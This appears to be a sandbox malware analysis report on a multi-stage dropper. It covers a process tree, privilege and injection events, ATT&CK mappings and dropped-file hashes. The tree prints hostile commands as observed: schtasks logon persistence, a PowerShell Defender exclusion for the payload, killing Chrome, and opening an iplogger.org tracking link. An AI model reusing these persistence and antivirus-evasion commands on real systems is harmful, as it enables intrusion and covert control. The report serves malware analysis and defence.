Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	4aa1e8b379159.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2244	schtasks.exe
2532	schtasks.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1200	4aa1e8b379159.exe
1200	4aa1e8b379159.exe
1200	4aa1e8b379159.exe
1200	4aa1e8b379159.exe
1552	chrome2.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
1308	268b3127b936e01.exe
2868	powershell.exe
2772	services64.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	2736	5298ab674.exe
Token: SeAssignPrimaryTokenPrivilege	2736	5298ab674.exe
Token: SeLockMemoryPrivilege	2736	5298ab674.exe
Token: SeIncreaseQuotaPrivilege	2736	5298ab674.exe
Token: SeMachineAccountPrivilege	2736	5298ab674.exe
Token: SeTcbPrivilege	2736	5298ab674.exe
Token: SeSecurityPrivilege	2736	5298ab674.exe
Token: SeTakeOwnershipPrivilege	2736	5298ab674.exe
Token: SeLoadDriverPrivilege	2736	5298ab674.exe
Token: SeSystemProfilePrivilege	2736	5298ab674.exe
Token: SeSystemtimePrivilege	2736	5298ab674.exe
Token: SeProfSingleProcessPrivilege	2736	5298ab674.exe
Token: SeIncBasePriorityPrivilege	2736	5298ab674.exe
Token: SeCreatePagefilePrivilege	2736	5298ab674.exe
Token: SeCreatePermanentPrivilege	2736	5298ab674.exe
Token: SeBackupPrivilege	2736	5298ab674.exe
Token: SeRestorePrivilege	2736	5298ab674.exe
Token: SeShutdownPrivilege	2736	5298ab674.exe
Token: SeDebugPrivilege	2736	5298ab674.exe
Token: SeAuditPrivilege	2736	5298ab674.exe
Token: SeSystemEnvironmentPrivilege	2736	5298ab674.exe
Token: SeChangeNotifyPrivilege	2736	5298ab674.exe
Token: SeRemoteShutdownPrivilege	2736	5298ab674.exe
Token: SeUndockPrivilege	2736	5298ab674.exe
Token: SeSyncAgentPrivilege	2736	5298ab674.exe
Token: SeEnableDelegationPrivilege	2736	5298ab674.exe
Token: SeManageVolumePrivilege	2736	5298ab674.exe
Token: SeImpersonatePrivilege	2736	5298ab674.exe
Token: SeCreateGlobalPrivilege	2736	5298ab674.exe
Token: 31	2736	5298ab674.exe
Token: 32	2736	5298ab674.exe
Token: 33	2736	5298ab674.exe
Token: 34	2736	5298ab674.exe
Token: 35	2736	5298ab674.exe
Token: SeDebugPrivilege	2780	4a448bcddaa0b3.exe
Token: SeDebugPrivilege	1272	0fd5c77ed90f39d5.exe
Token: SeDebugPrivilege	2560	taskkill.exe
Token: SeDebugPrivilege	1552	chrome2.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2872	1cr.exe
Token: SeDebugPrivilege	2772	services64.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3060	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3060	iexplore.exe
3060	iexplore.exe
2240	IEXPLORE.EXE
2240	IEXPLORE.EXE
2240	IEXPLORE.EXE
2240	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 2844	2148	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe	31
PID 2148 wrote to memory of 2844	2148	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe	31
PID 2148 wrote to memory of 2844	2148	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe	31
PID 2148 wrote to memory of 2844	2148	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe	31
PID 2148 wrote to memory of 2844	2148	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe	31
PID 2148 wrote to memory of 2844	2148	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe	31
PID 2148 wrote to memory of 2844	2148	1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe	31
PID 2844 wrote to memory of 2920	2844	setup_installer.exe	32
PID 2844 wrote to memory of 2920	2844	setup_installer.exe	32
PID 2844 wrote to memory of 2920	2844	setup_installer.exe	32
PID 2844 wrote to memory of 2920	2844	setup_installer.exe	32
PID 2844 wrote to memory of 2920	2844	setup_installer.exe	32
PID 2844 wrote to memory of 2920	2844	setup_installer.exe	32
PID 2844 wrote to memory of 2920	2844	setup_installer.exe	32
PID 2920 wrote to memory of 1956	2920	setup_install.exe	34
PID 2920 wrote to memory of 1956	2920	setup_install.exe	34
PID 2920 wrote to memory of 1956	2920	setup_install.exe	34
PID 2920 wrote to memory of 1956	2920	setup_install.exe	34
PID 2920 wrote to memory of 1956	2920	setup_install.exe	34
PID 2920 wrote to memory of 1956	2920	setup_install.exe	34
PID 2920 wrote to memory of 1956	2920	setup_install.exe	34
PID 2920 wrote to memory of 3056	2920	setup_install.exe	35
PID 2920 wrote to memory of 3056	2920	setup_install.exe	35
PID 2920 wrote to memory of 3056	2920	setup_install.exe	35
PID 2920 wrote to memory of 3056	2920	setup_install.exe	35
PID 2920 wrote to memory of 3056	2920	setup_install.exe	35
PID 2920 wrote to memory of 3056	2920	setup_install.exe	35
PID 2920 wrote to memory of 3056	2920	setup_install.exe	35
PID 2920 wrote to memory of 3064	2920	setup_install.exe	36
PID 2920 wrote to memory of 3064	2920	setup_install.exe	36
PID 2920 wrote to memory of 3064	2920	setup_install.exe	36
PID 2920 wrote to memory of 3064	2920	setup_install.exe	36
PID 2920 wrote to memory of 3064	2920	setup_install.exe	36
PID 2920 wrote to memory of 3064	2920	setup_install.exe	36
PID 2920 wrote to memory of 3064	2920	setup_install.exe	36
PID 2920 wrote to memory of 2436	2920	setup_install.exe	37
PID 2920 wrote to memory of 2436	2920	setup_install.exe	37
PID 2920 wrote to memory of 2436	2920	setup_install.exe	37
PID 2920 wrote to memory of 2436	2920	setup_install.exe	37
PID 2920 wrote to memory of 2436	2920	setup_install.exe	37
PID 2920 wrote to memory of 2436	2920	setup_install.exe	37
PID 2920 wrote to memory of 2436	2920	setup_install.exe	37
PID 2920 wrote to memory of 2164	2920	setup_install.exe	38
PID 2920 wrote to memory of 2164	2920	setup_install.exe	38
PID 2920 wrote to memory of 2164	2920	setup_install.exe	38
PID 2920 wrote to memory of 2164	2920	setup_install.exe	38
PID 2920 wrote to memory of 2164	2920	setup_install.exe	38
PID 2920 wrote to memory of 2164	2920	setup_install.exe	38
PID 2920 wrote to memory of 2164	2920	setup_install.exe	38
PID 2920 wrote to memory of 1484	2920	setup_install.exe	39
PID 2920 wrote to memory of 1484	2920	setup_install.exe	39
PID 2920 wrote to memory of 1484	2920	setup_install.exe	39
PID 2920 wrote to memory of 1484	2920	setup_install.exe	39
PID 2920 wrote to memory of 1484	2920	setup_install.exe	39
PID 2920 wrote to memory of 1484	2920	setup_install.exe	39
PID 2920 wrote to memory of 1484	2920	setup_install.exe	39
PID 2920 wrote to memory of 1436	2920	setup_install.exe	40
PID 2920 wrote to memory of 1436	2920	setup_install.exe	40
PID 2920 wrote to memory of 1436	2920	setup_install.exe	40
PID 2920 wrote to memory of 1436	2920	setup_install.exe	40
PID 2920 wrote to memory of 1436	2920	setup_install.exe	40
PID 2920 wrote to memory of 1436	2920	setup_install.exe	40
PID 2920 wrote to memory of 1436	2920	setup_install.exe	40
PID 2920 wrote to memory of 628	2920	setup_install.exe	41

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1c44852292cf03e534ef8c2914b22436_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2920
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 268b3127b936e01.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1956
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\268b3127b936e01.exe
        
        268b3127b936e01.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 21bcc8456d82.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3056
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\21bcc8456d82.exe
        
        21bcc8456d82.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:572
      - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\21bcc8456d82.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\21bcc8456d82.exe" -a
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 5298ab674.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3064
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\5298ab674.exe
        
        5298ab674.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2768
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 4a448bcddaa0b3.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2436
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\4a448bcddaa0b3.exe
        
        4a448bcddaa0b3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 0fd5c77ed90f39d5.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2164
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\0fd5c77ed90f39d5.exe
        
        0fd5c77ed90f39d5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 8e14eeece3767.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1484
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\8e14eeece3767.exe
        
        8e14eeece3767.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2420
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2872
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSB471.tmp\Install.cmd" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2612
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
        8⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:3060
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3060 CREDAT:275457 /prefetch:2
        9⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2240
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 28e2ddd2eed6.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1436
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\28e2ddd2eed6.exe
        
        28e2ddd2eed6.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:828
      - C:\Users\Admin\AppData\Local\Temp\chrome2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1552
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        7⤵
        
        PID:3028
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2244
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2772
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:1204
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2532
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        8⤵
        Executes dropped EXE
        
        PID:2516
      - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1744
        
        C:\Windows\winnetdriv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" 1728286697 0
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c b28b347be25f8ab8.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:628
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\b28b347be25f8ab8.exe
        
        b28b347be25f8ab8.exe
        5⤵
        Executes dropped EXE
        
        PID:484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 4aa1e8b379159.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1156
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\4aa1e8b379159.exe
        
        4aa1e8b379159.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:1200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 268b3127b936e0010.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2788
    - - C:\Users\Admin\AppData\Local\Temp\7zSC1B7B5C6\268b3127b936e0010.exe
        
        268b3127b936e0010.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2224
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 432
      4⤵
      Loads dropped DLL
      Program crash
      PID:1056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\softokn3.dll

Filesize
275B

MD5
a378c450e6ad9f1e0356ed46da190990

SHA1
d457a2c162391d2ea30ec2dc62c8fb3b973f6a66

SHA256
b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978

SHA512
e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
b78ab0439ef2f11304beca74c0b81a23

SHA1
6cb733c314ca8ea584f8ccf63b19501e1d19b90c

SHA256
3aeff520501f31140fe8c47e354dfb89032bd8c9583bde022e2b1d7479b44b9a

SHA512
97eeb552d8612e4c82fbf9b1984213f437f9e98cf86d51ded2bf3101bd84e769b35a86578f918d84e91379450f01fd80e60a03781052836101decf35995309ec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7618703e129f8c6b9b8ec7745ec07b9b

SHA1
dda243634fd853324ac5746ae1de6e643cf3d1a5

SHA256
d38748e99f8bf4abae9c7049adca85cba992e932c72a5a1a99cdb951855a77e0

SHA512
6e299b404422a0ea5ef3f4aa67951c9412b008dc93bc29cfbada92351d824cf7f4cf06acfc1b64006c0368d2b0aabf51486a366c973701d86db57a579738efc6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
691c5a33bfa45c3c2f9fb43a2f533721

SHA1
ab51434cd45781873485eac2e8cf338d292787a5

SHA256
59cb7481ee7fabe725e8bf0141a15da6450ecdee35c9bb0cbbad344952e349f6

SHA512
2edbceffe5c9cdb43e51c09c3bdd2fdea146d9334c076410d654d37287a90dfd577c216f4289b6466007c83a27757bb1c7c91332aa195655bab98935428db801

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a748007c54e02527f73855f82c5c02ac

SHA1
bc53796492daee5577e59fc0b9b44e6923aaf49f

SHA256
5f7ba22b3d8bccdfc84ac06b04354ba1835a7f5d5e675c738416ed865c07cc9f

SHA512
17083f65db754bd2a56679afc7bd1d8575b7301432673d442065e8c0dc944b54d938892e548c9a177d5ea8ea829290bba00fb6aeba960d27a222c7fcacb1926c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d6156c4741ede042118e51f9e33321ba

SHA1
bd6a5880ff6651834509801df71cc02367c67406

SHA256
1db2a339efff1be23ff57585c8d0aac043c69f44830efc08af0d42ace3c17175

SHA512
3ec5ad2fd1d5959dfa181dc769a3ae7ff7c3169244c7cddacff1d5cb87955ee159c3934aee89b0367be98bf562198a23e33e20de30fb25a98c8cee4212f6567e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
93bbe862f1ab0dfc5ec90e5a44799606

SHA1
a38724777c22c3da2d4006d8aed2e77fbe5518cb

SHA256
72388f338a226cfe64fc4b46f0a85a8740434f39ae6be556a9886a70e07192d8

SHA512
bc4e59f65cdf9ed5b00050b5b2283dce5c280a0d8042ea9cd68bd2903ac644ea697a90916020964ed776c919b1deaed017baf6fb891e532de1154e7be020da54

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
470cd3e49a63cbac8c04cb2a709c1db7

SHA1
97095abc270459d6fe0417ca4472fb3e87a7631d

SHA256
777d843bd801c99e9d5a44659b12038eb6f9667504298e438ac7ffa3b6fc0f9c

SHA512
e26c5fa8d9ad63e05395a9c74cb668d269373322d95980f673fab11b8f72d8f44e0bb31a45c1a2b39ad230d51e33d51fb0d5b84874bd7aca6106a7ac1d7bef83

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
427e68d17c0975e5343c7ae33c2d0541

SHA1
5ac4bd8783753df87031bd16b47c22c7aba999cb

SHA256
9da5aa8e58807a7f2d437eb8c762fc278a0c09e59df7a7cba0682b99b8b3ca38

SHA512
427b0b30c3563c035254167aa8894ee286c81c4b29a923d8d0486f8ed74687065fd1d354eb3af32b77c77edfa9ee9bd2dd5efe521f70bc9361ade6fc9816314b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b6d8b150eb648000653a694ff15c73d7

SHA1
10fc9140f27c2a842147649ea58521bc4ee7a778

SHA256
d53d6184d7b24a84daff8632beed809c6435da16125cb6630c1950d99d9e537f

SHA512
b8ef194cc02ece390615f62d5631b2cb5c0c9cf87989161d0077cc7b20293178ab7dc439a44865ba582378786b860271d4d8958547e148039a49bf92a2f59cda

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4ae04311baa04f2d773d8fcabd4cbaa9

SHA1
0b0a0f9863bf33c8d66c3c6dee2e2b303bc85995

SHA256
6d76e6e0304eaf6d44eebb0ee00b38130799561afc0e2e290a4800e3621fe996

SHA512
fd6e8a27feb6890f9c381525372c18b23ba7d0633ed5777e21e93b61a0171ee8fdd0906e5782317b9781777c0b535c8910a58cabe31ba172f0fd1798d6889470

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
38c5c646b650b7ca43a957474ad47578

SHA1
7a464faec45dc24324fac6a7fe257ef5535c4823

SHA256
3b09a29401c77c69fbc6e399c7a210d4df2d911d92703228803917da394de72e

SHA512
b8e185e1ec3ded038d30349862307810280df9b04e9c769e00e5bf400b0e0d058b525a852e39ea2ab41218575edf56e0ec0de900b65eb3e6bb964d97fdb8c437

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e13a73e3a70bcbb6a0f31a7dd7f470ad

SHA1
0a2e9f6ce477063f90b90b0fcef4e00d0bef660e

SHA256
c9ae876803aa750f0f74815fdbb91eece6172a757dfc3a591601e095fa0a18a0

SHA512
